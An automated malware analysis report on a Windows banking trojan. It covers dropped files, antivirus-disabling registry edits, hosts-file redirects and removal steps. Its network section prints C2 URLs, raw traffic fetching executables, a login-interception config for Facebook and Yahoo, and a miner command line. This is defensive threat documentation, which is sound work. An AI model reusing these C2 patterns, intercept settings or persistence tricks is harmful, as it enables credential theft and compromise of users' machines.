Susp_Dropper (Kaspersky), Gen:Variant.Symmi.25089 (B) (Emsisoft), Gen:Variant.Symmi.25089 (AdAware), mzpefinder_pcap_file.YR, BankerGeneric.YR (Lavasoft MAS)Behaviour: Banker
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: d6083eb7ba57b6804be94a23b1ba72b7
SHA1: 24ae81c07e461372819a1489b46c2d4419b479b1
SHA256: cb9972f6ff7f1d1a0ecc647d6567d4ef1b4b1a281464c07ef1977b6d8ec28021
SSDeep: 12288: PW4eTjsuguKMx4jc6JlAHtCYTmqhhHHwjtEcIWhdRBFipe/Ex6kAnTP: u40j1gu5x4I6JSAYTnhhfid0SExbU
Size: 800768 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-02-12 20:58:22
Analyzed on: WindowsXP SP3 32-bit
Summary: Banker. Steals data relating to online banking systems, e-payment systems and credit card systems.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
ihj3deeem5zr.exe:704
ihj3dee6umzr.exe:3840
smp5hldte9zo4u.exe:2780
smp5hld7ljzo4upwykfp.exe:2236
smp5hldgdxzo4u.exe:2804
smp5hld8mfzo4u.exe:2560
rtfrebrgje.exe:2956
rtfrebrgje.exe:396
rtfrebrgje.exe:1104
%original file name%.exe:1964
dklhlsph.exe:2108
dklhlsph.exe:3676
dklhlsph.exe:2720
The Trojan injects its code into the following process(es):No processes have been created.
File activity
The process ihj3deeem5zr.exe:704 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\dsvmzzbluxpxh\tst (10 bytes)
The process smp5hldte9zo4u.exe:2780 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\rtfrebrgje.exe (7547 bytes)
%System%\dsvmzzbluxpxh\tst (10 bytes)
The Trojan deletes the following file(s):
%System%\rtfrebrgje.exe (0 bytes)
The process smp5hld7ljzo4upwykfp.exe:2236 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\dsvmzzbluxpxh\etc (10 bytes)
%System%\rtfrebrgje.exe (5873 bytes)
%System%\drivers\etc\hosts (22 bytes)
%System%\dsvmzzbluxpxh\tst (10 bytes)
The Trojan deletes the following file(s):
%System%\drivers\etc\hosts (0 bytes)
The process smp5hldgdxzo4u.exe:2804 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\dsvmzzbluxpxh\tst (10 bytes)
The process rtfrebrgje.exe:2956 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\dsvmzzbluxpxh\rng (60 bytes)
%WinDir%\Temp\smp5hldgdxzo4u.exe (5873 bytes)
%System%\dsvmzzbluxpxh\run (10 bytes)
%WinDir%\Temp\smp5hldte9zo4u.exe (26305 bytes)
%System%\dsvmzzbluxpxh\cfg (110 bytes)
%System%\dklhlsph.exe (5873 bytes)
%WinDir%\Temp\smp5hld8mfzo4u.exe (35 bytes)
%System%\dsvmzzbluxpxh\tst (10 bytes)
The Trojan deletes the following file(s):
%WinDir%\Temp\smp5hldgdxzo4u.exe (0 bytes)
%WinDir%\Temp\smp5hldte9zo4u.exe (0 bytes)
%WinDir%\Temp\smp5hld8mfzo4u.exe (0 bytes)
The process rtfrebrgje.exe:396 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\dsvmzzbluxpxh\tst (10 bytes)
The process rtfrebrgje.exe:1104 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\dsvmzzbluxpxh\rng (40 bytes)
%System%\dsvmzzbluxpxh\run (10 bytes)
%System%\dsvmzzbluxpxh\cfg (446 bytes)
%System%\dsvmzzbluxpxh\aol\zip.exe (10500 bytes)
%System%\drivers\etc\hosts (100 bytes)
%System%\dsvmzzbluxpxh\aol\exefile (14580 bytes)
%WinDir%\Temp\ihj3deeem5zr.exe (7547 bytes)
%WinDir%\Temp\ihj3dee6umzr.exe (35 bytes)
%System%\dsvmzzbluxpxh\ihst (222 bytes)
%System%\dklhlsph.exe (7547 bytes)
%System%\dsvmzzbluxpxh\tst (10 bytes)
The Trojan deletes the following file(s):
%WinDir%\Temp\ihj3dee6umzr.exe (0 bytes)
The process %original file name%.exe:1964 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\smp5hld7ljzo4upwykfp.exe (3873 bytes)
%System%\dsvmzzbluxpxh\tst (10 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\smp5hld7ljzo4upwykfp.exe (0 bytes)
The process dklhlsph.exe:2108 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\dsvmzzbluxpxh\tst (10 bytes)
The process dklhlsph.exe:3676 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\dsvmzzbluxpxh\tst (10 bytes)
The process dklhlsph.exe:2720 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\dsvmzzbluxpxh\tst (10 bytes)
Registry activity
The process ihj3deeem5zr.exe:704 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "96 FB E8 06 B0 70 E1 5A 8A 48 A3 9C 79 B5 4B D6"
The process ihj3dee6umzr.exe:3840 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "79 88 D9 03 0B B9 F7 B3 3C 0F 28 EC 23 4E 9D FE"
The process smp5hld7ljzo4upwykfp.exe:2236 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7F 0E 03 4E 16 C3 7F EF 41 66 23 82 BB 87 5C F0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Block Controls Agent Upgrade" = "%System%\rtfrebrgje.exe"
The process smp5hldgdxzo4u.exe:2804 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 3A BF B6 2B D8 FA 2C C8 7E 2E F8 8D EF 76 BC"
The process smp5hld8mfzo4u.exe:2560 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 CE A3 0D 0E E8 CD 5F 23 D4 96 2D 0C C4 7F 99"
The process rtfrebrgje.exe:2956 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0E 89 FC 58 1D F2 15 D0 4C 6D BC 5B C0 F9 EF 9A"
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
"FirewallDisableNotify" = "1"
Antivirus notifications are disabled:
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"
The process rtfrebrgje.exe:1104 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 02 00 00 00 01 00 00 00 00 00 00 00"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 36 CF 01 63 8B 6C 08 62 DE 1F D6 F1 74 D3 D4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
Antivirus notifications are disabled:
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"
Dropped PE files
| MD5 | File path |
|---|---|
| 6a0c0feda509c4ac94d0390504580a40 | c:\WINDOWS\Temp\ihj3deeem5zr.exe |
| 6a0c0feda509c4ac94d0390504580a40 | c:\WINDOWS\Temp\smp5hldte9zo4u.exe |
| 6a0c0feda509c4ac94d0390504580a40 | c:\WINDOWS\system32\dklhlsph.exe |
| 6a0c0feda509c4ac94d0390504580a40 | c:\WINDOWS\system32\rtfrebrgje.exe |
HOSTS file anomalies
The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses. The modified file is 100 bytes in size. The following strings are added to the hosts file listed below:
| 127.0.0.1 | www.facebook.com |
| 127.0.0.1 | facebook.com |
| 127.0.0.1 | mail.yahoo.com |
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
ihj3deeem5zr.exe:704
ihj3dee6umzr.exe:3840
smp5hldte9zo4u.exe:2780
smp5hld7ljzo4upwykfp.exe:2236
smp5hldgdxzo4u.exe:2804
smp5hld8mfzo4u.exe:2560
rtfrebrgje.exe:2956
rtfrebrgje.exe:396
rtfrebrgje.exe:1104
%original file name%.exe:1964
dklhlsph.exe:2108
dklhlsph.exe:3676
dklhlsph.exe:2720 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%System%\dsvmzzbluxpxh\tst (10 bytes)
%System%\rtfrebrgje.exe (7547 bytes)
%System%\dsvmzzbluxpxh\etc (10 bytes)
%System%\drivers\etc\hosts (22 bytes)
%System%\dsvmzzbluxpxh\rng (60 bytes)
%WinDir%\Temp\smp5hldgdxzo4u.exe (5873 bytes)
%System%\dsvmzzbluxpxh\run (10 bytes)
%WinDir%\Temp\smp5hldte9zo4u.exe (26305 bytes)
%System%\dsvmzzbluxpxh\cfg (110 bytes)
%System%\dklhlsph.exe (5873 bytes)
%WinDir%\Temp\smp5hld8mfzo4u.exe (35 bytes)
%System%\dsvmzzbluxpxh\aol\zip.exe (10500 bytes)
%System%\dsvmzzbluxpxh\aol\exefile (14580 bytes)
%WinDir%\Temp\ihj3deeem5zr.exe (7547 bytes)
%WinDir%\Temp\ihj3dee6umzr.exe (35 bytes)
%System%\dsvmzzbluxpxh\ihst (222 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\smp5hld7ljzo4upwykfp.exe (3873 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Block Controls Agent Upgrade" = "%System%\rtfrebrgje.exe" - Restore the original content of the HOSTS file (%System%\drivers\etc\hosts): 127.0.0.1 localhost
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 625046 | 625152 | 4.72563 | 15d8577199cdc76febaf3c740802e9e9 |
| .rdata | 630784 | 50574 | 50688 | 3.68239 | 38f6c87f441b9d6af889847d2c59ffc0 |
| .data | 684032 | 157628 | 123904 | 5.49709 | 5d4d38ea339b05a2784c1221970abf74 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://donaven4guia.com/forum/search.php?method=validate&mode=sox&v=023&sox=3c801802 | 216.239.138.217 |
| hxxp://fredesecas.com/forum/search.php?method=validate&mode=sox&v=023&sox=3c801802 | 216.239.139.20 |
| hxxp://laloponea.com/forum/search.php?method=validate&mode=sox&v=023&sox=3c801802 | 216.239.138.68 |
| hxxp://davedekilai.com/forum/search.php?method=validate&mode=sox&v=023&sox=3c801802 | 66.147.244.161 |
| hxxp://tablefruit.net/forum/search.php?method=validate&mode=sox&v=023&sox=3c801802 | 98.139.135.198 |
| hxxp://stickmarch.net/forum/search.php?method=validate&mode=sox&v=023&sox=3c801802 | 208.91.197.241 |
| hxxp://groupcook.net/forum/search.php?method=validate&mode=sox&v=023&sox=3c801802 | 216.239.138.245 |
| hxxp://groupcook.net/forum/search.php?method=all&flag&mode=sox&v=023&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 | 216.239.138.245 |
| hxxp://groupcook.net/forum/search.php?method=checkport&port=28929&mode=sox&v=023&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 | 216.239.138.245 |
| hxxp://groupcook.net/forum/search.php?method=update&noxor&exe=rtfrebrgje.exe®=Block Controls Agent Upgrade&svc=Services Portable Audio Compatibility Class&wname=dklhlsph.exe&dir=dsvmzzbluxpxh&mode=sox&v=023&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 | 216.239.138.245 |
| hxxp://donaven4guia.com/index.php?method=validate&mode=sox&v=029&sox=3c801802 | 216.239.138.217 |
| hxxp://fredesecas.com/index.php?method=validate&mode=sox&v=029&sox=3c801802 | 216.239.139.20 |
| hxxp://laloponea.com/index.php?method=validate&mode=sox&v=029&sox=3c801802 | 216.239.138.68 |
| hxxp://davedekilai.com/index.php?method=validate&mode=sox&v=029&sox=3c801802 | 66.147.244.161 |
| hxxp://tablefruit.net/index.php?method=validate&mode=sox&v=029&sox=3c801802 | 98.139.135.198 |
| hxxp://stickmarch.net/index.php?method=validate&mode=sox&v=029&sox=3c801802 | 208.91.197.241 |
| hxxp://groupcook.net/index.php?method=validate&mode=sox&v=029&sox=3c801802 | 216.239.138.245 |
| hxxp://groupcook.net/index.php?method=all&flag&mode=sox&v=029&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 | 216.239.138.245 |
| hxxp://groupcook.net/index.php?method=setvar&key=cpuinfo&value=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz (3392 MHz)&mode=sox&v=029&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=1&adm=1&x64=0&mr=0 | 216.239.138.245 |
| hxxp://tablefruit.net/dep/zip.exe | 98.139.135.198 |
| hxxp://groupcook.net/index.php?method=hostname&host=www.facebook.com&mode=sox&v=029&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=1&adm=1&x64=0&mr=0 | 216.239.138.245 |
| hxxp://groupcook.net/index.php?method=dep&noxor&file=zip.exe&mode=sox&v=029&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=1&adm=1&x64=0&mr=0 | 216.239.138.245 |
| hxxp://groupcook.net/index.php?method=checkport&port=50225&mode=sox&v=029&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=1&adm=1&x64=0&mr=0 | 216.239.138.245 |
| hxxp://partyorderly.net/dep/zip.exe | 98.139.135.198 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /index.php?method=hostname&host=VVV.facebook.com&mode=sox&v=029&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=1&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: groupcook.net
HTTP/1.1 200 OK
Date: Wed, 14 May 2014 10:30:35 GMT
Server: Apache/2
Connection: close
Content-Type: text/html
.........................
GET /forum/search.php?method=validate&mode=sox&v=023&sox=3c801802 HTTP/1.0
Accept: */*
Connection: close
Host: davedekilai.com
HTTP/1.1 302 Found
Date: Wed, 14 May 2014 10:29:44 GMT
Server: Apache
Location: hXXp://box661.bluehost.com/suspended.page/disabled.cgi/davedekilai.com?method=validate&mode=sox&v=023&sox=3c801802
Content-Length: 375
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>302 Found</title>.</head><body>.<h1>Found</h1>.<p>The document has moved <a href="hXXp://box661.bluehost.com/suspended.page/disabled.cgi/davedekilai.com?method=validate&mode=sox&v=023&sox=3c801802">here</a>.</p>.<hr>.<address>Apache Server at davedekilai.com Port 80</address>.</body></html>...
GET /index.php?method=setvar&key=cpuinfo&value=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz (3392 MHz)&mode=sox&v=029&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=1&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: groupcook.net
HTTP/1.1 200 OK
Date: Wed, 14 May 2014 10:30:34 GMT
Server: Apache/2
Connection: close
Content-Type: text/html
.............
GET /forum/search.php?method=update&noxor&exe=rtfrebrgje.exe®=Block Controls Agent Upgrade&svc=Services Portable Audio Compatibility Class&wname=dklhlsph.exe&dir=dsvmzzbluxpxh&mode=sox&v=023&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: groupcook.net
HTTP/1.1 200 OK
Date: Wed, 14 May 2014 10:29:53 GMT
Server: Apache/2
Connection: close
Content-Type: text/html
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L....EmS.................H...R......b........`....@.........................................................................<#..P...................................................................p...@............`......<"..`....................text...FF.......H.................. ..`.rdata.......`.......L..............@..@.data....~...@......................@.............................................................................................................................................................................................................................................................................................................................................................................................................................................xcJ...q.......V....xcJ...q...D$..t.V..j.......^................................L$..T$.V.t$.W...r...;.u.............s...tD.....9 .u1...v5..B...y. .u ...v$..B...y. .u....v...B...I. ...._...^._3.^.............QV..j..L$...b...F....s.@.F..L$...b..^Y..........QVW..j..L$...b...G...v....s.H.G..w........L$.#...b.._..^Y..........cJ...........QW.9..t?j..L$..Xb...G...v....s.H.G.V.w........L$.#..[b....t.....j.....^_Y........D$..V.....cJ.t.V..i.......^....Q.A$V.0W.|$.j..L$..D$......7..a...F....s.@.F..L$...a...._^
<<
<<< skipped >>>
GET /forum/search.php?method=validate&mode=sox&v=023&sox=3c801802 HTTP/1.0
Accept: */*
Connection: close
Host: groupcook.net
HTTP/1.1 200 OK
Date: Wed, 14 May 2014 10:29:48 GMT
Server: Apache/2
Connection: close
Content-Type: text/html
304...sS........groupcook.net................n.i`.....#.........}K `.l$aC".x...Q@W?6.]...~.;"..w7..P..4.5K|...$.xB.B..N;S.....B.A3..7%*.....1h>.T0.n...H..~.i\.*.OC..9...Mqp.u..w?.Qn....>.......F..,..oDi.8P..H.....,.W.l....9R.\.]a_.W..... ..r.>.......W!.i........C.P..$^".p.... .MR.....$....TU..1-....n:.e.......HI....In...Mb.....Rm.N|lH.-(...I.18.........>.).Hx....!.xd^.}..q.o...uio8.CW&}........cb......~.z6....k,.&f.....(....pr........u...,...N=.Vv.F.......}.%.i.....R..kr.l..N.y/.9.G..,.[...c.c....4....Vp4...X...).{X...@.l....W.....F#`.1....>'....W.Q.|.........P.L......P.5.b. Dj/..Y,.]......k.|.F..-....{jC.)l..C.?....C...B.'..l..\I..B\y..,y...0]..iT..-#.....w?.."4YF.5M=i.DD....=.j8......C...1jQ.,!...;...RR.2..3...x.............tu..u..MW....01.*.LD.D.~............;..i...ks.N.I....vf..m..8Dk'u..G...R.....Z..>..0..wMj._u.Hv.f.(..F.LW../x.GB...1.....{....{.._.U...;6LX&.Gu...........:)....W~1./..~.....Q... .s..bs..-%.&...$.].......w.?.D...B./..|c.2w..3......m..u&5......X.f...$...k.-Y..l.g:a....<....Zm.9....I ..$.C.'....Z....y.X.fg..k#`...W...T.......|j...r..X..Z......t.}...J.R1.$_.s.H.s.....S .U9$.k......G......4.\......7.:.\e..*$.;....Mb.8.......^..N. ....}X.T..f.,.....UMAs...T..@T..K....".Y.........a)\.........ow........
GET /forum/search.php?method=validate&mode=sox&v=023&sox=3c801802 HTTP/1.0
Accept: */*
Connection: close
Host: fredesecas.com
HTTP/1.1 404 Not Found
Date: Wed, 14 May 2014 10:29:43 GMT
Server: Apache/2
Accept-Ranges: bytes
Content-Length: 21
Cache-control: no-store
Pragma: no-cache
Connection: close
Content-Type: text/html
Unknown Virtual Host...
GET /forum/search.php?method=validate&mode=sox&v=023&sox=3c801802 HTTP/1.0
Accept: */*
Connection: close
Host: donaven4guia.com
HTTP/1.1 404 Not Found
Date: Wed, 14 May 2014 10:29:42 GMT
Server: Apache/2
Accept-Ranges: bytes
Content-Length: 21
Cache-control: no-store
Pragma: no-cache
Connection: close
Content-Type: text/html
Unknown Virtual Host...
GET /index.php?method=dep&noxor&file=zip.exe&mode=sox&v=029&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=1&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: groupcook.net
HTTP/1.1 200 OK
Date: Wed, 14 May 2014 10:30:35 GMT
Server: Apache/2
Connection: close
Content-Type: text/html
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........::..[TM.[TM.[TM.GXM.[TM.}_M.[TM.GZM.[TM.DGM.[TM.[UM.[TM.}^MJ[TM_]RM.[TMRich.[TM................PE..L.....xH................. ...@.......u.......0....@..........................p..............................................XH..P....`.. ............................................................................0...............................text............ .................. ..`.rdata..."...0...0...0..............@..@.data........`.......`..............@....rsrc... ....`.......`..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
<<
<<< skipped >>>
GET /dep/zip.exe HTTP/1.0
Accept: */*
Connection: close
Host: partyorderly.net
HTTP/1.0 999 Unable to process request at this time -- error 999
Date: Wed, 14 May 2014 10:30:35 GMT
Expires: Thu, 01 Jan 1970 22:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Age: 0
Server: YTS/1.20.28
<HTML>.<HEAD>.<meta http-equiv="Content-Type" content="text/html;charset=utf-8" >..<!-- Title -->.<TITLE>.Yahoo! - 999 Unable to process request at this time -- error 999.</TITLE>.<!---------------->..<style>./* nn4 hide */ ./*/*/.body {font:small/1.2em arial,helvetica,clean,sans-serif;font:x-small;text-align:center;}table {font-size:inherit;font:x-small;}.html>body {font:83%/1.2em arial,helvetica,clean,sans-serif;}input {font-size:100%;vertical-align:middle;}p, form {margin:0;padding:0;}.p {padding-bottom:6px;margin-bottom:10px;}#doc {width:48.5em;margin:0 auto;border:1px solid #fff;text-align:center;}#ygma {text-align:right;margin-bottom:53px}.#ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;padding-bottom:8px;margin-left:152px;}#bd {clear:both;text-align:left;width:75%;margin:0 auto 20px;}.h1 {font-size:135%;text-align:center;margin:0 0 15px;}legend {display:none;}fieldset {border:0 solid #fff;padding:.8em 0 .8em 4.5em;}.form {position:relative;background:#eee;margin-bottom:15px;border:1px solid #ccc;border-width:1px 0;}.#s1p {width:15em;margin-right:.1em;}.form span {position:absolute;left:70%;top:.8em;}form a {font:78%/1.2em arial;display:block;padding-left:.8em;white-space:nowrap;background: url(hXXp://us.i1.yimg.com/us.yimg.com/i/s/bullet.gif) no-repeat left center;} .form .sep {display:none;}.more {text-align:center;}#ft {padding-top:10px;border-top:1px solid #999;}#ft p {text-align:center;font:78% arial;}./* end nn4 hide */.</style>
<<
<<< skipped >>>
GET /index.php?method=validate&mode=sox&v=029&sox=3c801802 HTTP/1.0
Accept: */*
Connection: close
Host: donaven4guia.com
HTTP/1.1 404 Not Found
Date: Wed, 14 May 2014 10:30:26 GMT
Server: Apache/2
Accept-Ranges: bytes
Content-Length: 21
Cache-control: no-store
Pragma: no-cache
Connection: close
Content-Type: text/html
Unknown Virtual Host...
GET /forum/search.php?method=all&flag&mode=sox&v=023&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: groupcook.net
HTTP/1.1 200 OK
Date: Wed, 14 May 2014 10:29:49 GMT
Server: Apache/2
Connection: close
Content-Type: text/html
ping.12.FLAG UPDATE cfg.318."southblood.net" "wifeknew.net" "frontride.net" "rememberpaint.net" "gentlefriend.net" "spokethere.net" "tablefruit.net" "wifeyesterday.net" "uponloud.net" "wrongthrew.net" "necessarydress.net" "thistomorrow.net" "saltsecond.net" "signarmy.net" "littleappear.net" "mightglossary.net" "whichsing.net" "lasopeidres.com" var_user_ip.427.%kill_jhminer% = "1";.%set_intercepts% = ""VVV.facebook.com" "partyorderly.net" "/fb_login/" "/login/" "1" "facebook.com" "partyorderly.net" "/fb_login/" "/login/" "0" "mail.yahoo.com" "partyorderly.net" "/yahoo/" "/config/" "0" ";.Þp_host% = "partyorderly.net";.Þp_path% = "/dep/";.%no_password% = "0";.%timer% = "1200";.%cpuinfo% = " Intel(R) Atom(TM) CPU K510 @ 1.66GHz (1666 MHz)";.%state% = "BU";.%newport% = "50046";.plugin.55070.miner_forced.80.win32drkclient.exe -a X11 -o stratum tcp://"%local server IP%":3388 -u 3c801802 -p x.MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........lg...4...4...4.?y4...4...4...49..4...4...4...4...4...4...4...4...4...4Rich...4................PE..L.....\S.....................N....................@.............................................................................(.......................................................................@...............HTTP/1.1 200 OK..Date: Wed, 14 May 2014 10:29:49 GMT..Server: Apache/2..Connection: close..Content-Type: text/html..ping.12.FLAG UPDATE cfg.318."southblood.net" "wifeknew.net" "frontride.net" "r
<<
<<< skipped >>>
GET /index.php?method=validate&mode=sox&v=029&sox=3c801802 HTTP/1.0
Accept: */*
Connection: close
Host: laloponea.com
HTTP/1.1 404 Not Found
Date: Wed, 14 May 2014 10:30:28 GMT
Server: Apache/2
Accept-Ranges: bytes
Content-Length: 21
Cache-control: no-store
Pragma: no-cache
Connection: close
Content-Type: text/html
Unknown Virtual Host...
GET /index.php?method=validate&mode=sox&v=029&sox=3c801802 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 404 Not Found
Date: Wed, 14 May 2014 10:30:29 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html; charset=iso-8859-1
Age: 0
Server: YTS/1.20.28
<h1 style='color:#497A97;font-size:12pt;font-weight:bold'>404 - Not Found..
GET /index.php?method=all&flag&mode=sox&v=029&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: groupcook.net
HTTP/1.1 200 OK
Date: Wed, 14 May 2014 10:30:34 GMT
Server: Apache/2
Connection: close
Content-Type: text/html
